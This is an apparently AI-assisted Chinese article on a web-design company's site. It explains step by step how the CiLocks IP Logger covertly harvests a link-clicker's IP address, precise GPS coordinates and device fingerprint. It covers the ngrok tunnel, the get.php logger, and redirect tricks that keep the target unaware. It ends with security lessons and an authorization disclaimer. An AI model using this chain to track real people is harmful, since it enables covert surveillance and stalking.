拓冰建站拓冰建站
首页 / 资讯中心 / 正文

CiLocks地理位置回传原理:get.php的GET参数数据全链路拆解

CiLocks地理位置回传原理get.php的GET参数数据全链路拆解【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocksCiLocks 是一款 Android/iOS 渗透测试工具集其 IP Logger 功能可以在目标点击链接后静默回传地理位置、设备信息等数据。本文以 info/get.php 为核心完整拆解这条地理位置回传的 GET 参数数据链路浏览器如何采集坐标、13 个 GET 参数如何拼装与落盘、终端又如何一键解析出地图链接。一、整体架构一条链接的三段式回传链路 CiLocks 的地理位置回传不依赖任何 App 或 Root 权限只需要目标用户点击一个链接。整条链路分为三段阶段运行位置关键文件① 搭服务 开隧道攻击者本机cilocks 主脚本② 采集 IP 与定位目标浏览器info/index.php → info/index2.html③ 接收并落盘数据攻击者本机 PHPinfo/get.php / info/error.php二、第一步本地 PHP 服务 ngrok 公网隧道 执行 IP Logger 菜单项后主脚本 cilocks 的start()函数会做三件事清空旧数据删除上一轮的info/ip.txt、info/geolocate.txt、info/error.txt避免脏数据启动本地 Web 服务php -S 127.0.0.1:3333文档根目录指向 info/ 文件夹拉起 ngrok 隧道./ngrok http 3333把本机 3333 端口暴露到公网并从 ngrok 本地 API 中提取出形如https://xxxx.ngrok.io的链接提示Send this link to the Target。如果没有 ngrok脚本会先检测 CPU 架构arm/386自动下载对应二进制见 cilocks。三、第二步目标端——IP 记录与浏览器定位采集 3.1 入口index.php 先顺手记录 IP目标打开链接后实际请求的是隧道根路径下的 info/index.php。它只有 5 行逻辑include ip.php—— 先执行 info/ip.php随后header(Location: index2.html)302 跳转到定位页面。info/ip.php 按HTTP_CLIENT_IP→X-Forwarded-For→REMOTE_ADDR的优先级取出目标 IP连同 User-Agent 一起以追加模式写入info/ip.txt。这一步不需要任何用户授权链接被打开的瞬间 IP 就已落盘。3.2 核心index2.html 调用 Geolocation API 采集 13 项数据跳转到 info/index2.html 后页面提示Enable your Location and Refresh并在页面加载时onLoadgetLocation()调用navigator.geolocation.getCurrentPosition(showPosition, showError, { enableHighAccuracy: true, timeout: 30000, maximumAge: 0 })定位成功后showPosition()函数会采集两组数据数据组字段地理坐标latitude纬度、longitude经度、altitude海拔、accuracy精度、speed速度、heading朝向设备指纹useragent、platform、hardwareCPU 核数、memory设备内存、width/height屏幕分辨率四、第三步get.php——13 个 GET 参数一次性回传与落盘 采集完成后info/index2.html 用一行window.location.href把全部参数拼进 URL跳转get.php?latitude..longitude..altitude..platform..accuracy.. speed..heading..hardware..memory..useragent..height..width..这就是地理位置回传真正发生的地方。info/get.php 的核心逻辑仅两行file_put_contents(geolocate.txt, ..., FILE_APPEND)—— 把 12 个$_GET参数格式化为标签: 值文本追加写入info/geolocate.txtheader(Location: https://google.com)—— 立即把目标跳转到 google.com。第 2 行是反侦察的关键目标看到的是页面加载后跳到了谷歌首页而坐标数据其实已经在跳转前写入了服务器文件。五、错误分支error.php 的 4 种错误码 如果用户拒绝了定位授权或定位失败info/index2.html 的showError()会把错误码写入 URL 跳转到 info/error.php错误码含义目标端提示1PERMISSION_DENIED 用户拒绝授权Please, Allow Location Permission...2POSITION_UNAVAILABLE 定位不可用—3TIMEOUT 超时Please refresh this page...4UNKNOWN_ERROR 未知错误—info/error.php 只把error.php?errorN中的数字记入info/error.txt然后执行javascript://history.go(-1)让浏览器返回上一页——目标只看到网页没反应又退回去了完全无感知。六、终端解析从 geolocate.txt 到一键地图链接 ️数据落盘后cilocks 的checkfound()循环以 0.5 秒间隔轮询文件出现情况发现info/ip.txt→ 触发catch_ip()提取 IP 与 UA并调用 ip-tracker.org 解析出大洲、国家、城市、ISP、AS 号等信息再自动转入定位等待阶段发现info/geolocate.txt→ 触发 catch_cred()用grepcut逐行解析出纬度、经度、海拔、精度、速度、朝向、平台、CPU 核数、内存、分辨率等字段并打印到终端。其中最有价值的一行输出是自动拼好的地图链接Map: https://www.google.com/maps/place/纬度经度解析结果同时会被追加保存到info/saved.geolocate.txt历史留存最后清理 php、ngrok、ssh 进程并退出。整个回传从目标点击链接到终端显示地图链接通常只需几秒钟。七、全链路文件清单 文件角色cilocks主脚本起服务、开隧道、轮询解析info/index.php入口记录 IP 后跳转到定位页info/ip.php目标 IP User-Agent 落盘到 ip.txtinfo/index2.html浏览器端采集 13 项数据并发起 GET 回传info/get.php地理位置回传核心写 geolocate.txt 跳转谷歌info/error.php定位失败错误码记录浏览器返回上一页八、安全启示这条链路教会我们的三件事 ️浏览器定位是敏感权限任何提示启用位置才能访问的网页都值得警惕——授权瞬间经纬度精度可达数十米就已离开你的设备HTTP 头与跳转是天然的隐藏层User-Agent明文记录、跳转谷歌/返回上一页的障眼法说明攻击痕迹可以被设计得对用户零可见本地 PHP 文件落盘 无数据库依赖FILE_APPEND追加写一个纯文本文件即可完成服务端存储部署成本几乎为零这也是 CiLocks 这类工具能在 Termux 上直接跑起来的原因。⚠️ 本文仅作技术原理分析。CiLocks 仅可用于自己拥有权限的设备或已授权的安全测试未经授权对他人使用属于违法行为。【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
分享:

看完干货,该让你的企业上线了

免费需求沟通 · 48 小时内出具建站方案 · 河南本地可上门